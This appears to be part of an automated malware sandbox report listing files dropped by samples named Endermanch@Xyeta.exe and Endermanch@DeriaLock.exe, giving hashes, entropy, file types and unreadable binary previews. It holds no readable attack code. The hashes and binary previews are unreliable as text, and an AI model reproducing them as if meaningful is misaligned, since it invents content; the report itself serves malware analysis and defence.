                                                                                                                                                SHA-512:8E6B1822B93DF21DD87BF850CF97E1906A4416A20FC91039DD41FD96D97E3E61CEFCD98EEEF325ADBD722D375C257A68F13C4FBCC511057922A37C688CB39D75
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK........;.=>.#.}.,...P......Endermanch@Xyeta.exe.V.t*J...:K.J.....(.T.........zv.....+jQ..s.l..'OZ..5.a.c}..>..+.M.\....C,c...E.L6@ml.D./.&W..f^...`........T.%.u....X......%..F..i...'.F.....R-.8.9f:......d...Gd.B../...&g.c.T..P#.].>w..&S\.i.b.....s..|.....P............[.}..y...h.5]v..a....I..H.?.......B.Z./<.%.S..v...q....#.g,{E.a..&k....]...[8..%.x U#..-.-&R..M._|e.+.1.L.+.%.U!..iK....y6.r%..NR9......F... ..J~..n.]....'.J$+._l'.F..........L....-b.....'...8......0.Q...._...i..=%...M..?.)`t...2..Te....7\'. ..m....~}....d...:%...7FV&..Y..=.xG...*.)9q,....}..u.H.@]7f..T[.....{.....$E.f..x.s.N'(XI..j.X.b\..J..,..I.<.>....!.nW...4..7R{ ..?......PG6.yh....f`..".J B.l...'6.&q_..Fhr@.:..kkbiF...2/q..^.@.DH...s.^..7@...&.....\3.;:.%' .?.......D....C?....A....X.p..i.7.YY:L.JE.{..CYfp...n..<.wXa%}..........X.#I....:.eu.....:......FMUk.l.O'...'....].*^.95..i.F..sB..A.ZG.]/...+.....3.r6.8*l.....G8A4}.C..1.~....`....|..~....nL>(@..p..~..z.....}Fck..W.....J
                                                                                                                                                Process:C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4286
                                                                                                                                                Entropy (8bit):5.3285098896210705
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:q5TREu+R0/SIRVzdE5nFM4TPtR38akzmZmSBqLRDWjJQzEL:/uvI5FlTFR37kabBQ6t2E
                                                                                                                                                MD5:6DCF0828D86EB0D16CCEC58D8DA72DEE
                                                                                                                                                SHA1:5DC2470CA2D37A3856792204A23203B20B94BAEB
                                                                                                                                                SHA-256:7DCBCE665F842836972E7EBAA865C90702E1318146A93244FCBD1D8433DF7957
                                                                                                                                                SHA-512:6A73A7CF24253CC9D89BFE0F864317BFE34DB5921B55FDBC4E08E2C1359AFBF314DB25A585213AAEC34B1CE61AD771141A7A4E87AAFFDA159A5AF7871136EA64
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................................................................................................................."...-...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...3...-..."..............."...D...Z...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...Z...D..."...........-...................................................................................................................-...........3...................................................................................................................3...........3..........#...#...#...#...#...#..."..."..."..."..."..."..."..."..."..."..."..."..."..."..."..."..."..."............3...........3..........#...#...#...#...#...#...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.824368872704883
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MEKNel2gkiRxCfdE+A8pRw86SEd+aEI2IaD7ez8lKyBF:MEK6DxkdrK/B+aE5B5lKyD
                                                                                                                                                MD5:7E5B9F111D1E4A1F25FC53B9F8BE1BBC
                                                                                                                                                SHA1:BEB047B13A85CE37981B03EF2FC909C23AA8E3B6
                                                                                                                                                SHA-256:D475555C6803EE84BCCBF03F8C101FFD167630FA100AB9860FC14A7BB430EB71
                                                                                                                                                SHA-512:57E03894E76AB23E78CEE2F385ACAB69F9E5C0398FF53CDB0DFF69DE9B4FCA71320EE550B25FD3278565ADF05979CF98928DEEA95C2A36F8FC0B6AE546A6E9F7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.]g.\...Y.5*bm"=.Ly.=+..)......1.q....../.5...ij.ix..qH........~.+b..2..,... [...:u...Ji.g..U?..BV..e.*....q.{W..\u....>.=M...WO..I+...(......eK..:[...+<V..L.<Y..Z/ie-....:.V.`...^a|J.:k......~.ci.m.r\*.%..+./..J`0.]T\.4...T-. ...>[.pLb....d.\..$.a....Pz....&..K.=..X..*...A...b..@.".R._V7..;..m.k.E.a.6~..F........UK........|. ......G...".+c.W%F....<tD/;...GJ/...H.. '...}.=%8a..f..I.Sc..qk.~.O8.[.E....]...".$..Y:.o.k.v...0...W...*` ...T...".$w....o8.!U.n!..I.....}......>N....j&..l...l`...%..[.B.{..B.J..4q.~.....i<.]L.lU..\..A.%..=.[...*#?.<..t.>\..>.G;...:K8(...}{..,.....rP.X....E....a..x...Q.G..5....0.i.=...iQdY.-.......(..a....@.....c....]y.x5.kJ....M...P..n^.,.i7.....#8..n.)<.....X......UE.D..7e>.....{.!.R../......D.........+.n6m.K1O$A4.M..:.u..%V...#.t...u%B..}.?.A..V4s..E.^"'....#.....Lp..#...w..C.CgQ..!..9..b>...fJ'..!0.....60J..k....+V..p0.<4.....3..I..L.....J...1...j...h....D.s|....O.m.Eu&......-X}cPi6.....C2$..D..B.....drh.Q....q,....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.796075793910062
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Xmk7T6amrld7OMB4DtDpWx31Km2b/6brqSof7HX42rCO8VJJvl+Y:Xr+amrld4BVaL6ydO7HX4pl+Y
                                                                                                                                                MD5:C4F595B789B1F7524DB7CEB3C2DAEAAC
                                                                                                                                                SHA1:B3A5596A8BE59DD1136C74F495BEDEBB75E4B897
                                                                                                                                                SHA-256:E535053A05303EB39BDA8EF572A1BE0516E5DC37D70CCFC47B27351C792891FB
                                                                                                                                                SHA-512:77A070BA8226C03AE0924AF6B7E255285372F54C08B95C14B051BAF673CE7F6BA1FAC5B5D78608142A3A8F60B3D2919E9CF10F531954F5B285752575A539D1C6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..H.>.....M.SA...... ``6.L.q|?.E....h.(..3..:..4pl...?^..s4.7..,.(.....S.....H4.." ../......*.....$..|.....$.e.....cU.......YB...`.........r..)F.'j..t...wrz:x..o....Q....++..@&..E.."....Q.PV..".l]...5...tu,..L..xev.n.Y..P..Kw..|s&....FqI....TaL_M..U..@.G$.w...I%.e|zp,'.|....W..E..P..F0."=.4o X.7Sj!._>..&>......HY....w..:...e....@...~..*.{....>f|.$..!..h...:.$..A6W..<.....aBP..6.f..>...Y...Y...<......B.B.h{y......u..C....[.O..qf..w.......@K`.......U..2a.?2.D.ir...j.N..u9'T......g.1..+..........Ve.e...O'd..h..(..."s.4..wX.&...\r1s..t...f.y.a:Frz.s.?w.;.>&.O..$Bn...;.=rC...X.......".i{....[^...`*...3..a..N..\.....c.I..jl8...{..j..;.i%vO,^.(.#...LxY..k..Q.....C..:K.|.c.....'.,.<...`...R.. ..%..7g]..S....3OjH^A.....r\T.&..y..{.....1C.)|uk.(s...i...)n......6.Ta..N[...g..P.....'.&O.oxJ.[a.T.Ld...>...>.........0..N.0y`.:.P4/F...R.....z.\.B.B=.%.'7..Mp].1.=..........{...h},19...++.Y..KH.tN........./...?>.....j#.!.ImM.#]...O.B.#*..r......+.J..U.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.785376226751931
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:f8cD17vQvfYJnLSc91KzPw6Mtr0fBNdC5YhPaQtOrAaek1JxlQeu:tD50fYJn24w066eY5kJFaeOnOf
                                                                                                                                                MD5:529A9EEE0215DCA5F2D77FE33B7F6197
                                                                                                                                                SHA1:2B19995D64D6533C267617162CF6C5DB7A4DAB91
                                                                                                                                                SHA-256:487EE8701568B0926D8624E50E830B35AC0958667C3E9067A764D0611826DE09
                                                                                                                                                SHA-512:820B90CCF45A84919458E7D7A108FEFB99154CAD0B2EBFDAF66BDB1037E44230C188B3DE41E954FD4C62B0240B36A89471E34CC15D4A76FE46C253CC5D412830
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:....Gig..U.U..~...*.W]BP....4.n...[.gzC.Q|..|z2...!..#w..+.N....yN4.h..8.Xf.iGd..;...c@...;0G...I.c.A....NhVx.SQ...1(..u._....................{H.@Il._.k....)...$..7..l`..,.=..G...W!.6.Hd..~..[.M..'K......m.YM.E...#V|K!D.}|H..jV.J...~...l."...W..F.A.^m....{%..#..G.UK...9"...HJ..9.FF..b......[...E...p.%.).rQ...lh....M...\.&..../..#.......mE_...7s........FXq._EH.c...)..^.j)l..@....u.D...,.pE.W.._OlR..i...}.......2g...gw.[v..l....3..l)&}.....x.R...HuI...6y1...Cf8......P..WH@j......fx.8.g.?.;*d.Q`k.WG~S.YO...."0..>+|l....`..."..o.'gCQ#d{....g=...}..%5XMlGb..9`(|...t.S...h.......r..*.3B....".8[...t3...GH.X...S.<6......9.....Mp.9.{.@?8r${.+.....q.|.FV.sB...@A-....8.n.d+..X?..4..J..w.3.d%.....MLR.d_4.u1....^..'.Q.~=o....\.......E`.Vs....|.".R....,...M.-.#...Y.W4I......b...{Kb....r..6.S8X_../II.o..Ul.w@.6o6..Xl.],i.b..<RD.....*.R.O....vm;...Va|J...Y...}go...e{.fY..Q.h...1..$..,%u..i........-.y<w>\(.P.....k.....)F0._...DrC......9.Tn..\k.kZ.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.824368872704883
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MEKNel2gkiRxCfdE+A8pRw86SEd+aEI2IaD7ez8lKyBF:MEK6DxkdrK/B+aE5B5lKyD
                                                                                                                                                MD5:7E5B9F111D1E4A1F25FC53B9F8BE1BBC
                                                                                                                                                SHA1:BEB047B13A85CE37981B03EF2FC909C23AA8E3B6
                                                                                                                                                SHA-256:D475555C6803EE84BCCBF03F8C101FFD167630FA100AB9860FC14A7BB430EB71
                                                                                                                                                SHA-512:57E03894E76AB23E78CEE2F385ACAB69F9E5C0398FF53CDB0DFF69DE9B4FCA71320EE550B25FD3278565ADF05979CF98928DEEA95C2A36F8FC0B6AE546A6E9F7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.]g.\...Y.5*bm"=.Ly.=+..)......1.q....../.5...ij.ix..qH........~.+b..2..,... [...:u...Ji.g..U?..BV..e.*....q.{W..\u....>.=M...WO..I+...(......eK..:[...+<V..L.<Y..Z/ie-....:.V.`...^a|J.:k......~.ci.m.r\*.%..+./..J`0.]T\.4...T-. ...>[.pLb....d.\..$.a....Pz....&..K.=..X..*...A...b..@.".R._V7..;..m.k.E.a.6~..F........UK........|. ......G...".+c.W%F....<tD/;...GJ/...H.. '...}.=%8a..f..I.Sc..qk.~.O8.[.E....]...".$..Y:.o.k.v...0...W...*` ...T...".$w....o8.!U.n!..I.....}......>N....j&..l...l`...%..[.B.{..B.J..4q.~.....i<.]L.lU..\..A.%..=.[...*#?.<..t.>\..>.G;...:K8(...}{..,.....rP.X....E....a..x...Q.G..5....0.i.=...iQdY.-.......(..a....@.....c....]y.x5.kJ....M...P..n^.,.i7.....#8..n.)<.....X......UE.D..7e>.....{.!.R../......D.........+.n6m.K1O$A4.M..:.u..%V...#.t...u%B..}.?.A..V4s..E.^"'....#.....Lp..#...w..C.CgQ..!..9..b>...fJ'..!0.....60J..k....+V..p0.<4.....3..I..L.....J...1...j...h....D.s|....O.m.Eu&......-X}cPi6.....C2$..D..B.....drh.Q....q,....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.796075793910062
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Xmk7T6amrld7OMB4DtDpWx31Km2b/6brqSof7HX42rCO8VJJvl+Y:Xr+amrld4BVaL6ydO7HX4pl+Y
                                                                                                                                                MD5:C4F595B789B1F7524DB7CEB3C2DAEAAC
                                                                                                                                                SHA1:B3A5596A8BE59DD1136C74F495BEDEBB75E4B897
                                                                                                                                                SHA-256:E535053A05303EB39BDA8EF572A1BE0516E5DC37D70CCFC47B27351C792891FB
                                                                                                                                                SHA-512:77A070BA8226C03AE0924AF6B7E255285372F54C08B95C14B051BAF673CE7F6BA1FAC5B5D78608142A3A8F60B3D2919E9CF10F531954F5B285752575A539D1C6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..H.>.....M.SA...... ``6.L.q|?.E....h.(..3..:..4pl...?^..s4.7..,.(.....S.....H4.." ../......*.....$..|.....$.e.....cU.......YB...`.........r..)F.'j..t...wrz:x..o....Q....++..@&..E.."....Q.PV..".l]...5...tu,..L..xev.n.Y..P..Kw..|s&....FqI....TaL_M..U..@.G$.w...I%.e|zp,'.|....W..E..P..F0."=.4o X.7Sj!._>..&>......HY....w..:...e....@...~..*.{....>f|.$..!..h...:.$..A6W..<.....aBP..6.f..>...Y...Y...<......B.B.h{y......u..C....[.O..qf..w.......@K`.......U..2a.?2.D.ir...j.N..u9'T......g.1..+..........Ve.e...O'd..h..(..."s.4..wX.&...\r1s..t...f.y.a:Frz.s.?w.;.>&.O..$Bn...;.=rC...X.......".i{....[^...`*...3..a..N..\.....c.I..jl8...{..j..;.i%vO,^.(.#...LxY..k..Q.....C..:K.|.c.....'.,.<...`...R.. ..%..7g]..S....3OjH^A.....r\T.&..y..{.....1C.)|uk.(s...i...)n......6.Ta..N[...g..P.....'.&O.oxJ.[a.T.Ld...>...>.........0..N.0y`.:.P4/F...R.....z.\.B.B=.%.'7..Mp].1.=..........{...h},19...++.Y..KH.tN........./...?>.....j#.!.ImM.#]...O.B.#*..r......+.J..U.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.8207971381237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:XlryTiJ783eJxpYF/sXsfib3bsQzZWDcaEtZssKm06H:XlrUbOXcNfMPzZ1sLG
                                                                                                                                                MD5:D2C0090ADDD7125E2B4D16F1C7E0D69A
                                                                                                                                                SHA1:FEF7004AAC003FC0D6F2B675820897F09C8207AA
                                                                                                                                                SHA-256:05BD26604B8BCB6B3467D6B2E84B5B75EE58AD48C672516B53347CCA7DF62B9B
                                                                                                                                                SHA-512:7F3D0F4A4891EBF5923BC7D89B3C5BCF454D51A99F0767F099A36458D0D6C40DB4FE43E534045DE842C02C03ADFFBB652B6321502C3D6770EA87744E264C82E3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:*...W..eT....:..$..s..UQ.v.U6..|SVb.O.R.o.^....6..........V.~`.I........s}G.Y...-CA..S..[.....%....{.}.*.J.,y}.zj....":...R.-. ....M^.[1...nzK.*.......A....3.....f./^?{...m.T....<.........5.b.2F..L`.....B9.R.346......9.E,.*F..w.%.....9.`.S.G...s.. ..o...|uV.].E.-.PTKH...Wxb9..^#.]O..I...".Q2.8.t.9&...../;`p..w.]B.J.v...B..9d.d..$...O....f.h!.G6.........q..|'.Z`].......K09..V....^@.....T....R..^.TG.?...-.....C..I.y._s8.uH..-.5n....[..T...c'..4y.L.B...T...+...e8..j.^.-...OW@.!.r..((.>...r.q..4..a..Y...Ev=~.XP..k..o_./..."..M..i .....V...u....@...j..(.......l.i.[.q.o...;....&D.U._..d[.t..O.J.....<.hr. {.=...~H._.y...M....u...}...G.P.UC..>..L-/........t9.H.....{F...n.....K.^%./+."...KF.J~.ZO/..F...k..(.......&u.^.jC.3.....S'].Aq.*\.........4.K..U.S..b...........<pI%F! ...a.<s.y.J...N.L...._...{...D.c.........}..hF.......m...'j.J..w..d........A.#.|4.i....S^.k......}.3.o....c{....nwm.K.-^U....|..W../....C..........tZ;.vt....g#.....`....\
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.775161817333955
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:7n4A+9v0pbrpVlLbW1FIAnV8Qdeb2UlcBLU6OnctCgubGQtk:7nXqvCfdLbWPIAnddenlDjnRa
                                                                                                                                                MD5:258630CACCCFDE63FFF80D277346D031
                                                                                                                                                SHA1:86A89D841872C5573C7E235E6074B30760F8F08C
                                                                                                                                                SHA-256:ABBA326F7887E4E2ABFB796183A829235729C3DF0C1430CE48670921AE9B04B1
                                                                                                                                                SHA-512:364CFA3D258795E699EA8ADB9C3AE5AECE6C3F82BAD7DF2F310362F6355C028A04A6645CC5CA8723F055DD7C6976060F2F8C56170F2FDDCD7ED85C8663354CFC
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..2..G..Z...(^@3.d...S.=..3m2.nt.d>.s#....4..[.......YCSc.:..x.?.<_...0Ta[4..LQ..~:..l...c.'~..g.~...ej..$.I|........h.,..n.6..ox........VknOb..jN.u.9....I}-.....}......5......*..`....T..1x.R..Ns.W... .d..R.o..h..Z.,......h.....8) ..o..ozuh.....-..H..pU..S.~..pn.AP.U.6.........i.A..T..f..?..~.U.QM..qv........h.j...|...5.......'2.....2&?'+.q.DyWe. {..D:..@....[A9...-m..n...%L...=.:...M.C.a..Z.FO...~...U.....K.......hQ."..j.T.i.<S.....N..=6..1..r...e.Ao.A...Wc$...:..,...8].....R_WP..8p6.a\..]rg[.(.......Q.....O.Q.tZ.x<.}.9.j8.u..F......s.E...zTY..A...y..t...~..Z...:;.W...B,.....?@&fy.(2........W......8..wLOQ+.........+QV.=a.x......g.;c..[..W..h....s..v_I.]1..g.W!.:...|P......-){...Y...f.[.nVA.i..?...4...........<}..w.uV./.M...(._.j..|./...c<.2*.M...a.g.kI)w...vg...,.? ...,.7)P..^R;+.r.....oYvp.#...90.]..I..?G.u..,.........j..N*.UA..V....?..$.NQ..T.D..3MT.:.....E......g.X..v......uRB5G...l..3...Q....6A)....7O(?....K.H..N..zT.....h|......
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.824117775615902
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:eFLAUWIzVnFljb1iLHZcjwEU81MhI9+6wn:eFLA2zFjZUCwes6wn
                                                                                                                                                MD5:2EC787EEF9F9EFDBD340A9CB0D3D4D36
                                                                                                                                                SHA1:CB7C1135BFCDC7BF6E1BE69DB342B34665B352D3
                                                                                                                                                SHA-256:EBB9457201990693DC1DEF1C4F1F7462EBB12B3FCDD7C5B67F46E96B5F78C169
                                                                                                                                                SHA-512:481499A356BF304597DE36E87D7AA1797B676FCA506632D41375142A960569C781D00B0679A91DA37E037AADCBC6B79A820B59D0739E537E0D402B947C63CBAF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:+4.x......`....<..t.uAn...JmUM.Ik(?i.a}-.i<.a.....{..A...=..M..r/..;...Q.i....e[.?l..{....:.e..........+..Z.}Z..S.n..~...dj!.T...}..N+..`81..J..D).a.C...L.z..I.....Y..X..-....E.....uY.......q..Gs........Me2M.e..>.b....|*..(...Gt...y.O....TW]wy/f+..6.bF..........g`.?K...8;L.u.il..r.).J3.O.-<....ku...D=~.W..w..;...AOs.d8.<.k........._..Yrq..>BG..ux..6..A.....3]k.J~..5.U.q.A.\0^;X\k..m.b2=.@P.........+Mqj....'j.Mc&...r..7o../.u.f.DC.vo../r...qw..c..&..2..B..e..6.B.:..`....E.3.*.<...rX.......Ef..B...r..Q4\..H....(..N...[+....=...Xa.O..3.....CV.;...1..q(=y^...............v....j.5AG.#k,......%.m......N..NV?%..[+Z+....:\...zK.k...O......."O8].e...(zd....#........\Ebe.......t..n.K.>.."{8f.......4...F...1$...R ^........+.V*&...Qpo.b.2.gy.7'.oY.hu.......D.Kf....j..i^=../$I2.?...Gb....f...&k`X........F....... /.....4./.........].........j.Q..=.}o..[.O...z%IE.......N...E@... C..(..(6.4.....-L...?%,.gH}..3).K.U..&.Dy;..h.........phhR..O9.S2?Q
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.780049732096254
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:dSRxY99DapdENpF0m4qUyv1zavUmaQLhbh4DUDO:GxY7DapdsH4xyvxd9EhbMUDO
                                                                                                                                                MD5:0D72E9C5394B438F959CB19649EF7C31
                                                                                                                                                SHA1:A5FED6D805F250A2758EDC8975EB6631E1E359E9
                                                                                                                                                SHA-256:0CD930F919B56058AA93D969546869C02D266377E627A6885F5557FC692AE0A8
                                                                                                                                                SHA-512:CA14020CF1FD91772DF88A4EA158451A04657380F475DCF317F0683CE684173AB2335E4C47D9C34DFE3FF6BDABFDF54504181565E15A9042A6DEBCED27D34B07
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:Z){..[.\...6.$...r..T..{$P`jW......-Zr../|.3...j..I9QQ.dW......m.x..uPj.B...p...F....oQ.k...5)...Q.....1`.............S...sq~k.j0...,3B1....uU.3.o..]....K..9A...@.]...../......=...e..Q2..Zt..np...u....E.........s.>...@78V.p.s.)...)ba..P.i[N*.0....l.I..Y...?.M>...)...8%.s[.N..8.......M6.5.0}`\w.7. .T.z.E..F..e...1.b...H..%..2.l.(...a..C....!.Cx...=.?F.Dtq.MX...n...[...N..#...e./(..}<|I.#"..9[p...9..H]...7O;.(...V..7A....Z.=.bW...q....#.....k....h7hnX.9.c[...#.0P._.......p........f.#.N..%..$.W..l.Kz>.$.O|.=....;a>...ec.:.D.i....?...... .w.=7~....\s...le...W....PL^8..*..b)HA...Y9Y.h..jAn}.........9g.....7...5.9..m....(...z.C1g.{..GT.._..MI.8...V)I&.%..!P..".l.T...*.-.g.Y)....E....}A.......[..B...h..u..G..W........P...R.Vz..:.s...eO.MV.Y...x..z..I..s..8%.l....v.6...`F...7...[;.M....>X.h."g.$)..2k..p.M....85.p[.!v.!.8f..97..y.2T..1nE.<.[......p/..q.c...ht...w...w.. ..8f.A.;...b9.....j....2.[...4.F.....z...../=~]c,.....c.g....:.{70.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.818504523839842
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:HxtyZy1KSJmu7TnfCeeuRQ5v5Cp5yxSwO:zRmunnKk25v0/wO
                                                                                                                                                MD5:6F31A9271E78C10B41F80BF91825B8EE
                                                                                                                                                SHA1:92FFF143D5C1FE8352FF48114A0EECFC434FE7B9
                                                                                                                                                SHA-256:D61256FA9605F12123BED15CA89C7729981244F44D7BA4562FEF72511810B8A2
                                                                                                                                                SHA-512:63E4B3D2EAF247CAB0F79F5CA196BD5E74A74058ECA9AADA3D438FF66B6911CD9AC6729C8ED306A7D2149A3B49ADAD0D41CAB323EBC528C2F0D5AB1D13C5D6A9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:J.Y.qV..d#...%}.jl...hY..iIkO.RJi.....z.?..k....W.....L..7a~l."o....FZ...v..".>TH..n..i..>.{.....Z7...a!...oX.q....fIM=.NH.1.T&;.......B..~..V...5.}...#....=O.t.y....:......\..8)u,q..O......vhc......3..ZWa..<.]oUd.:.-...me.Mq9..H..{..A....b.t.|~h.e.K...q.?..ne...1.W".R..r.........G....D.`..q.'.....;F.s.R..-[1t....,..u.t.o.Ld..tP%..+.D..q......._.]'..)$.9...ib.C..fcS..2.+.|.6K:.9.c".........~n.m..R6...*.Wi.!.S........Cl....HMn..N. .....t...o..T.e....#.J.O.........7g.........Z..E&..hpb.'..k1..S....3...7..-.x...h....h..V....R.....=<.96.C.....g`o9.*v.....Tg|8.b..Xdn!..o..............S49d..13..Z.o..Qc.OGw.=...Q9....(...u.r...%mu9.......d9...;...i^.Xz.._*vf.r)'...Kl.Q..T0.{L.....J....@n..l]..dB..V.V...F..Et*{.....t...V.#$j.....|..P7..o.i_.C.h.S.;...^4..Z..$1.(g......f.....TU.4I...O^.p+....QY.Q........<..>.k.#....z..2.......+D|eu&5.#.[.......e.D...Q..9.>}/...'D..t...U.X..........`.....s.R.....4..l.7...nx..V...\.........(..t7@".....].c.R.....<.73
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.82417409597557
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:vWc4vUZoiofoCmS61TYzkvtbh+vYYfK41pL6htKhSgwRvUyT2YYC:ecZFofo86JLdhJuJhMv7T2C
                                                                                                                                                MD5:FD13FCE510EAB9D04BFC7BBDB020684B
                                                                                                                                                SHA1:F628560296788DD74DE27A293B79C92C09A05A9C
                                                                                                                                                SHA-256:53640C45CA026557AA00F57A0303F8D3AA26A6ADD563B919B5E583CB22B43DFA
                                                                                                                                                SHA-512:55F5830BA63D7C9C52E6DD9B68E9662EA7539B7435FBA01FE08A1744D560C2E7CC6AB230CB6B332C254D48C6CD568C79DBC0C3C2B7EF40AC7D54DEA9C75D5502
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:l.S.o<I...|=.wj...o.i.D...L.'.`.....6......m.9.e..V....0.D..4.&.....i.........X.(.......o.....x....>.D.u..$_r..a.Y.E.)...Y..!Y.....U.=$...1.C......g...h9T..".)r..U....Wd......../j..7......h..J.Z..a..... ....=....5.O...0....,...+.}r........0..5...w.:k....9)h.s.s.9..Y.T..@....4.0l.9w....L.....L+"..K.aB/..i.J.yy.Sc>U..;..nIMAA.<.h...Z!Fw.]S..C...w.-`b..0..K..%#9...._U.]..W.....N.W.........y7Q...p..b...]16z...GX....0...Z.[..)..T.y.d]...2Am........v&.Vb.fv.l.T/..*...t|.F.@..B.H..qKv.~. ,m..H.G.t>.....E...0.a.....,$.D&!..{%L.`.v..x...|.`....(.H_..;e.0..v..eh.Ih.&..Q.,|....(./".-_S[..Ri..3}...h.......G.}.H...)..>..C.j$.l.G\k......pQ_.URy.......S)O.z9M`..!J=......1.'...t..w\.E...mrL..}g>7+.-....i...Fc..~;..i........Y........3..}1.B....u.1. ..g....Z.L}y....I......?0....gW..w/..4..(p.=.Y!NYNJ.U#J#jW...&*...d`..S.. ...2...d+.s.yn..|.....p.g..@...k....PBw...n.e..............:G%..(..~....Oj.p"....N..A[..;.6...g..Vdn.....tT:x6:9..Z.4 v.`....1?f.b....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.850560412626575
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:O3FWMp+XLCMJaNQ0ScFMVATu3iJxaI0iMx9nJO0N+aAch/2TLzGNZnsFIA8N:O3YMo7CMQYAKOaI4J7B2vOVW8N
                                                                                                                                                MD5:D24934A8D88172036E7C438148A23028
                                                                                                                                                SHA1:C7E7379AB0ABE312285864734F662AF0B9CFBB33
                                                                                                                                                SHA-256:DB97059A8DC342AAE3AAF577D854A35FA902A312167F01709FF3A286F9143964
                                                                                                                                                SHA-512:83CE780118E28D717D8DBB0E87DCC47B1B5AFBEE3AC5BE2972FF453E36065033BBD24C4973A1AD498D68CD1A698C844D3FD6619C24C8C8F91B23A8091E8C498F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
